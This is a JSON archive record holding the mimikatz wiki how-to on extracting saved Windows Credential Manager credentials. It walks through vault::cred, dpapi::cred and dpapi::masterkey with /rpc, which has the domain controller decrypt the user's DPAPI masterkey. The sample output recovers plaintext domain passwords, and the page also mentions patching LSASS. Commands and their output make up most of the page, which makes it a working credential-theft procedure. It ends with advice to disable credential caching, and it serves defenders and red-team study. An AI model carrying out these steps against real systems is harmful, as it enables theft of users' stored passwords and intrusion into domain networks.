{
	"id": "b6097d7b-d01d-439a-b8b3-6a74755f942d",
	"created_at": "2026-04-06T00:16:14.632275Z",
	"updated_at": "2026-04-10T03:21:43.869396Z",
	"deleted_at": null,
	"sha1_hash": "fa7f21fa5027b540d159ff24eabc2b80d3511ce7",
	"title": "howto ~ credential manager saved credentials",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 107984,
	"plain_text": "howto ~ credential manager saved credentials\r\nBy gentilkiwi\r\nArchived: 2026-04-05 16:22:01 UTC\r\nThere are some ways to get saved credentials from the Credential Manager.\r\nThe normal, the standard, the usual way...\r\nWith mimikatz it's as easy as: vault::cred\r\nmimikatz # vault::cred\r\nTargetName : genaddr / \u003cNULL\u003e\r\nUserName : genuser\r\nComment : \u003cNULL\u003e\r\nType : 1 - generic\r\nPersist : 3 - enterprise\r\nFlags : 00000000\r\nCredential : genpass\r\nAttributes : 0\r\nTargetName : domsrv / \u003cNULL\u003e\r\nUserName : domusr\r\nComment : \u003cNULL\u003e\r\nType : 2 - domain_password\r\nPersist : 3 - enterprise\r\nFlags : 00000000\r\nCredential :\r\nAttributes : 0\r\nTargetName : LegacyGeneric:target=genaddr / \u003cNULL\u003e\r\nUserName : genuser\r\nComment : \u003cNULL\u003e\r\nType : 1 - generic\r\nPersist : 3 - enterprise\r\nFlags : 00000000\r\nCredential : genpass\r\nAttributes : 0\r\nTargetName : Domain:target=domsrv / \u003cNULL\u003e\r\nUserName : domusr\r\nComment : \u003cNULL\u003e\r\nType : 2 - domain_password\r\nPersist : 3 - enterprise\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 1 of 7\n\nFlags : 00000000\r\nCredential :\r\nAttributes : 0\r\nNo magic behind it: it uses the standard CredEnumerate API, first with Flags at 0, then with\r\nCRED_ENUMERATE_ALL_CREDENTIALS to try to get them all.\r\nCombined with vault::list, it's enough to get a lot of credentials for the current user (especially Web stuff).\r\nProblem\r\nCredentialBlob\r\nSecret data for the credential. The CredentialBlob member can be both read and written.\r\nIf the Type member is CRED_TYPE_DOMAIN_PASSWORD, this member contains the plaintext Unicode\r\npassword for UserName. The CredentialBlob and CredentialBlobSize members do not include a\r\ntrailing zero character. Also, for CRED_TYPE_DOMAIN_PASSWORD, this member can only be read by the\r\nauthentication packages.\r\nhttp://msdn.microsoft.com/library/windows/desktop/aa374788.aspx\r\nWorkaround\r\nSo, if we want access to saved network share credentials, RDP passwords, etc., we need to be admin and alter\r\nLSASS in order to:\r\npatch its logic (prevent LSASS from checking whether the type is CRED_TYPE_DOMAIN_PASSWORD) - this is the current\r\nbehavior of the /patch argument.\r\ninject a thread or a module into LSASS to be seen as an authentication package\r\nDanger\r\nThis operation will alter LSASS and is NOT recommended, especially when you can use the DPAPI method.\r\nDPAPI (all the things)\r\nA basic introduction to DPAPI stuff is here: module ~ dpapi\r\nAs shown in https://1drv.ms/x/s!AlQCT5PF61KjmCAhhYO0flOcZE4e, credentials are stored in the user's profile.\r\nUsually in:\r\n%appdata%\\Microsoft\\Credentials\r\n%localappdata%\\Microsoft\\Credentials\r\nLet's take a look\r\nUsing the cred function of the mimikatz dpapi module, you can view the \"content\" of a credential file.\r\nmimikatz # dpapi::cred /in:\"%appdata%\\Microsoft\\Credentials\\85E671988F9A2D1981A4B6791F9A4EE8\"\r\n**BLOB**\r\n dwVersion : 00000001 - 1\r\n guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n dwMasterKeyVersion : 00000001 - 1\r\n guidMasterKey : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n dwFlags : 20000000 - 536870912 (system ; )\r\n dwDescriptionLen : 00000050 - 80\r\n szDescription : Données d’identification d’entreprise\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n dwAlgCryptLen : 000000c0 - 192\r\n dwSaltLen : 00000010 - 16\r\n pbSalt : 024e83a1b7c1412251dd2718126fca84\r\n dwHmacKeyLen : 00000000 - 0\r\n pbHmackKey :\r\n algHash : 00008004 - 32772 (CALG_SHA1)\r\n dwAlgHashLen : 000000a0 - 160\r\n dwHmac2KeyLen : 00000010 - 16\r\n pbHmack2Key : e2bbe3a6e2fe7120ad9000afc3aa5ec2\r\n dwDataLen : 00000090 - 144\r\n pbData : 9ee6d5c1385baac832fdd3ed1fb21719fc643806df27deb30a0f0b80bfe6258fbd86dc4dfe920b8ad39653b0f\r\n dwSignLen : 00000014 - 20\r\n pbSign : d0f3cb42d4f7aa0253a9229c6da5c6697448887f\r\nWhat is interesting here:\r\ndwFlags : 20000000 - 536870912 (system ; ) this is the \"bad\" news... DPAPI protected the blob\r\nwith the CRYPTPROTECT_SYSTEM flag, preventing an unprivileged process from decrypting the blob... (~= not\r\nyou, only LSASS)\r\nguidMasterKey : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2} this is the GUID of the masterkey needed\r\nto decrypt the blob. LSASS has it in its cache, or will be able to load it on the fly when needed...\r\nDecrypt\r\nNaive approach\r\nBecause of the system flag (protected by the signature of the blob - we can't alter it), LSASS will refuse to\r\nunprotect the blob for us...\r\nDecrypting Credential:\r\n * using CryptUnprotectData API\r\nERROR kuhl_m_dpapi_unprotect_raw_or_blob ; CryptUnprotectData (0x0000000d)\r\ndeeper\r\nThe masterkey\r\nHere, thanks to the previous GUID we know that the masterkey is located in: %appdata%\\Microsoft\\Protect\\\r\n\u003cusersid\u003e\\cc6eb538-28f1-4ab4-adf2-f5594e88f0b2\r\nmimikatz # dpapi::masterkey /in:\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1719172562-3308538836-3929312420-1104\\cc6\r\n**MASTERKEYS**\r\n dwVersion : 00000002 - 2\r\n szGuid : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n dwFlags : 00000000 - 0\r\n dwMasterKeyLen : 00000088 - 136\r\n dwBackupKeyLen : 00000068 - 104\r\n dwCredHistLen : 00000000 - 0\r\n dwDomainKeyLen : 00000174 - 372\r\n[masterkey]\r\n **MASTERKEY**\r\n dwVersion : 00000002 - 2\r\n salt : 704f7ca8be647c20dc36e8ae4127966b\r\n rounds : 00004650 - 18000\r\n algHash : 00008009 - 32777 (CALG_HMAC)\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n pbKey : 1277546c39d446616022d57823d8337b20b89ef8077dd68acdf65a38ef60310ab66175eeb766a39d66cdc0cb7\r\n[backupkey]\r\n **MASTERKEY**\r\n dwVersion : 00000002 - 2\r\n salt : 3afaf040c982786cfa36342d8005a16f\r\n rounds : 00004650 - 18000\r\n algHash : 00008009 - 32777 (CALG_HMAC)\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n pbKey : d9c4e107b6eda306d7b4bf09a23693165d2faa6d52f509c0c4a8cbf08950919024176739d11d82d1e4e6f1659\r\n[domainkey]\r\n **DOMAINKEY**\r\n dwVersion : 00000002 - 2\r\n dwSecretLen : 00000100 - 256\r\n dwAccesscheckLen : 00000058 - 88\r\n guidMasterKey : {9c71e914-1ed5-4338-8461-4dcc363553be}\r\n pbSecret : dd39d20bd5ea9b9b677c1ada3da052cc240476185020337a96df497bd9b46dbf499d5c02d341721d55d3087ac\r\n pbAccesscheck : 2c5332354ab0bf2ec0fdb17489661e8785532feb72fc491c978cec342f714665e570904642434cc3852ef18cd\r\nAuto SID from path seems to be: S-1-5-21-1719172562-3308538836-3929312420-1104\r\nIf you are a domain admin, the domainkey part can be very interesting... but here, we assume you are\r\nonly the current user...\r\nIf you know the user's password, you can easily decrypt the masterkey with it.\r\nSo, no solution? Here are a few questions to ask yourself:\r\n1. how do you deal with smartcard users without NTLM transmitted?\r\n2. do hippos think rhinos are unicorns?\r\n3. does a domain user who forgets their logon password lose their saved data?\r\nRPC\r\nIn a domain, a domain controller runs an RPC service to deal with users' encrypted masterkeys, MS-BKRP:\r\nhttps://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-BKRP/[MS-BKRP].pdf\r\nhttps://twitter.com/gentilkiwi/statuses/746493452582526976\r\nThis service holds the RSA private key associated with all masterkeys of the domain, and is in charge of\r\nproviding decryption to authorized users (the danger around this never-changing RSA private key is another story,\r\nwe're not admin here ;) - https://twitter.com/gentilkiwi/statuses/609890409830064129 ,\r\nhttps://twitter.com/gentilkiwi/statuses/604408115090591744 )\r\nAs this cc6eb538-28f1-4ab4-adf2-f5594e88f0b2 masterkey belongs to the current user, we can certainly use it\r\nwith the /rpc argument:\r\nmimikatz # dpapi::masterkey /in:\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1719172562-3308538836-3929312420-1104\\cc6\r\n**MASTERKEYS**\r\n dwVersion : 00000002 - 2\r\n szGuid : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n[...]\r\n[domainkey] with RPC\r\n[DC] 'lab.local' will be the domain\r\n[DC] 'dc.lab.local' will be the DC server\r\n key : 3ed054e284b5d47796f4779a2c0de63ca0ea9c63ce9e3f6868e2dd4f1113f6f3c55d9c1e21d2378c4499f98c0682991647dfd5f6\r\n sha1: 81c99543dea591c11f20d69027ea2016d89d07dd\r\nSo sweet! The domain controller has decrypted it for us, and mimikatz has placed it in its cache:\r\nmimikatz # dpapi::cache\r\nCREDENTIALS cache\r\n=================\r\nMASTERKEYS cache\r\n================\r\nGUID:{cc6eb538-28f1-4ab4-adf2-f5594e88f0b2};KeyHash:81c99543dea591c11f20d69027ea2016d89d07dd\r\nDOMAINKEYS cache\r\n================\r\nWith the key in the mimikatz cache, we can display the credential file one last time:\r\nmimikatz # dpapi::cred /in:\"%appdata%\\Microsoft\\Credentials\\85E671988F9A2D1981A4B6791F9A4EE8\"\r\n**BLOB**\r\n dwVersion : 00000001 - 1\r\n guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n dwMasterKeyVersion : 00000001 - 1\r\n guidMasterKey : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n dwFlags : 20000000 - 536870912 (system ; )\r\n dwDescriptionLen : 00000050 - 80\r\n szDescription : Données d’identification d’entreprise\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n dwAlgCryptLen : 000000c0 - 192\r\n dwSaltLen : 00000010 - 16\r\n pbSalt : 024e83a1b7c1412251dd2718126fca84\r\n dwHmacKeyLen : 00000000 - 0\r\n pbHmackKey :\r\n algHash : 00008004 - 32772 (CALG_SHA1)\r\n dwAlgHashLen : 000000a0 - 160\r\n dwHmac2KeyLen : 00000010 - 16\r\n pbHmack2Key : e2bbe3a6e2fe7120ad9000afc3aa5ec2\r\n dwDataLen : 00000090 - 144\r\n pbData : 9ee6d5c1385baac832fdd3ed1fb21719fc643806df27deb30a0f0b80bfe6258fbd86dc4dfe920b8ad39653b0f\r\n dwSignLen : 00000014 - 20\r\n pbSign : d0f3cb42d4f7aa0253a9229c6da5c6697448887f\r\nDecrypting Credential:\r\n * volatile cache: GUID:{cc6eb538-28f1-4ab4-adf2-f5594e88f0b2};KeyHash:81c99543dea591c11f20d69027ea2016d89d07dd\r\n**CREDENTIAL**\r\n credFlags : 00000030 - 48\r\n credSize : 0000008e - 142\r\n credUnk0 : 00000000 - 0\r\n Type : 00000002 - 2 - domain_password\r\n Flags : 00000000 - 0\r\n LastWritten : 11/12/2017 19:58:36\r\n unkFlagsOrSize : 00000010 - 16\r\n Persist : 00000003 - 3 - enterprise\r\n AttributeCount : 00000000 - 0\r\n unk0 : 00000000 - 0\r\n unk1 : 00000000 - 0\r\n TargetName : Domain:target=domsrv\r\n UnkData : (null)\r\n Comment : (null)\r\n TargetAlias : (null)\r\n UserName : domusr\r\n CredentialBlob : dompass\r\n Attributes : 0\r\nGood, we now have credentials:\r\nServer: domsrv\r\nUserName: domusr\r\nPassword: dompass\r\nWithout any particular rights.\r\nWhat can you do?\r\nNearly nothing... the ability of a user to decrypt their own masterkeys by RPC is by protocol/design... and is needed when\r\nusing smartcards or when passwords are lost.\r\nBut storing domain credentials in the Credential Manager is a bad practice... even Microsoft recommends disabling\r\nit... (but, in the name of legacy, enables it by default)\r\nBest practices\r\nIt is a recommended practice to disable the ability of the Windows operating system to cache credentials\r\non any computer where credentials are not needed. Evaluate your servers and workstations to determine\r\nthe requirements. Cached credentials are designed primarily to be used on laptops that require domain\r\ncredentials when disconnected from the domain.\r\nOriginal text and GPO to disable this kind of sensitive storage:\r\nhttps://technet.microsoft.com/library/jj852185.aspx\r\nSource: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials"
	],
	"report_names": [
		"howto-~-credential-manager-saved-credentials"
	],
	"threat_actors": [],
	"ts_created_at": 1775434574,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa7f21fa5027b540d159ff24eabc2b80d3511ce7.pdf",
		"text": "https://archive.orkl.eu/fa7f21fa5027b540d159ff24eabc2b80d3511ce7.txt",
		"img": "https://archive.orkl.eu/fa7f21fa5027b540d159ff24eabc2b80d3511ce7.jpg"
	}
}